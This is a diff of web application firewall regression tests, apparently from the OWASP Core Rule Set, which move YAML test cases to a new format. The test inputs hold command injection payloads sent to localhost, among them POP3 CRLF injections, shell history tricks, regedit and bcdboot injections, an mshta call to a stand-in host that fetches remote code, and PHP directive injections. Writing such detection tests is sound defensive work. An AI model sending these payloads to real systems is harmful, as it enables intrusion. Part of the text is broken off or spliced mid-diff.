stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" + version: HTTP/1.0 + output: + log: + expect_ids: [932320] + - test_id: 11 desc: "POP3 APOP Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Look%2C%20apop%20star! - version: HTTP/1.0 - output: - no_log_contains: id "932320" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Look%2C%20apop%20star! + version: HTTP/1.0 + output: + log: + no_expect_ids: [932320] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml index e8f786a99..81edbfea9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml @@ -2,108 +2,107 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 PL3 Command Injection test cases" - enabled: true - name: 932321.yaml +rule_id: 932321 tests: - - test_title: 932321-1 + - test_id: 1 desc: "POP3 QUIT/STAT/NOOP/RSET/CAPA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932321" - - test_title: 932321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log: + expect_ids: [932321] + - test_id: 2 desc: "POP3 QUIT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Don't%20quit" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Don't%20quit" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 3 desc: "POP3 CAPA Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=we%20do%20not%20have%20that%20capability - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=we%20do%20not%20have%20that%20capability + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 4 desc: "POP3 STAT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hi%20lestat! - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hi%20lestat! + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 5 desc: "POP3 NOOP Command injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0aSeriously%2C%20noop" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0aSeriously%2C%20noop" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] + - test_id: 6 desc: "POP3 RSET Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Someone%20bought%20this%20nice%20lerset - version: HTTP/1.0 - output: - no_log_contains: id "932321" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Someone%20bought%20this%20nice%20lerset + version: HTTP/1.0 + output: + log: + no_expect_ids: [932321] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml index f3c86c781..fb3b2d645 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml @@ -2,22 +2,21 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932330.yaml +rule_id: 932330 tests: - - test_title: 932330-1 + - test_id: 1 desc: "Unix shell history invocation: relative position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!-1!-2" - version: HTTP/1.0 - output: - log_contains: id "932330" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!-1!-2" + version: HTTP/1.0 + output: + log: + expect_ids: [932330] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml index 4b8b11c2a..f147a23d5 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml @@ -2,38 +2,37 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932331.yaml +rule_id: 932331 tests: - - test_title: 932331-1 + - test_id: 1 desc: "Unix shell history invocation: absolute position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!1" - version: HTTP/1.0 - output: - log_contains: id "932331" - - test_title: 932331-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!1" + version: HTTP/1.0 + output: + log: + expect_ids: [932331] + - test_id: 2 desc: "Unix shell history invocation: last command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!!" - version: HTTP/1.0 - output: - log_contains: id "932331" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!!" + version: HTTP/1.0 + output: + log: + expect_ids: [932331] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml index 5b3ca8ddf..422afebd9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml @@ -2,75 +2,74 @@ meta: author: "airween, Franziska Bühler, azurit" description: "Remote Command Execution: Windows Command Injection test cases" - enabled: true - name: 932370.yaml +rule_id: 932370 tests: - - test_title: 932370-1 + - test_id: 1 desc: "Windows Command Injection true positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" - uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" + uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" + version: HTTP/1.0 + output: + log: + expect_ids: [932370] + - test_id: 2 desc: "Windows Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=regedit " - uri: "/get?cmd=regedit%20" - version: HTTP/1.0 - output: - no_log_contains: id "932370" - - test_title: 932370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=regedit " + uri: "/get?cmd=regedit%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932370] + - test_id: 3 desc: "Windows Command Injection - bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; mshta http://example.com" - uri: "/get?cmd=;%20mshta%20http://example.com" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; mshta http://example.com" + uri: "/get?cmd=;%20mshta%20http://example.com" + version: HTTP/1.0 + output: + log: + expect_ids: [932370] + - test_id: 4 desc: Windows Command Injection bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932370] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml index 5e5f82e1b..8e4ad88c2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml @@ -2,175 +2,174 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: Windows shell command injections - enabled: true - name: 932380.yaml +rule_id: 932380 tests: - - test_title: 932380-1 + - test_id: 1 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot < file.txt Match input redirection to bcdboot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 2 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with normal argument stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 3 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot/r file.txt Match bcdboot with argument without preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 4 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with argument with multiple preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 5 desc: | Windows shell command injection with 'sort' (false positive): sort%3Dex%26sort%3Dascending Do not match query parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932380] + - test_id: 6 desc: | Windows shell command injection with 'sort' (false positive): sort%3D0 Do not match encoded path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932380] + - test_id: 7 desc: "Windows shell command injection using 'bcdboot'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" + version: HTTP/1.0 + output: + log: + expect_ids: [932380] + - test_id: 8 desc: False positive against 'time warner' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: "id \"932380\"" - - test_title: 932380-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932380] + - test_id: 9 desc: False positive against 'time for' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - data: | - payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. - output: - no_log_contains: "id \"932380\"" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: | + payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. + output: + log: + no_expect_ids: [932380] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index c586dec53..cf96b5e1f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml @@ -1,151 +1,149 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None - enabled: true - name: 933100.yaml +rule_id: 933100 tests: - - test_title: 933100-1 + - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo= + - ------WebKitFormBoundaryoRWIb3busvBrbttO-- - version: HTTP/1.1 - output: - log_contains: id "933111" + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log: + expect_ids: [933111] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index a9661c56c..47955fc8a 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml @@ -1,169 +1,167 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 933120.yaml +rule_id: 933120 tests: - - test_title: 933120-1 + - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=opcache.jit_max_polymorphic_calls%3d50" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=opcache.jit_max_polymorphic_calls%3d50" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 2 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=session.referer_check%3dtrue" - version: HTTP/1.0 - output: - no_log_contains: = found within - - test_title: 933120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=session.referer_check%3dtrue" + version: HTTP/1.0 + output: + log: + match_regex: 'session.referer_check found within ARGS:var:' + - test_id: 3 desc: "PHP Injection Attack: Configuration Directive: engine" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=engine%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=engine%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 4 desc: "PHP Injection Attack: Configuration Directive: extension" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=extension%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=extension%3dtrue" + version: HTTP/1.0 + output: + log: + expect_ids: [933120] + - test_id: 5 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_retry_limit" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_retry_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_retry_limit%3dtrue" + version: HTTP/1.0 + output: + log: + 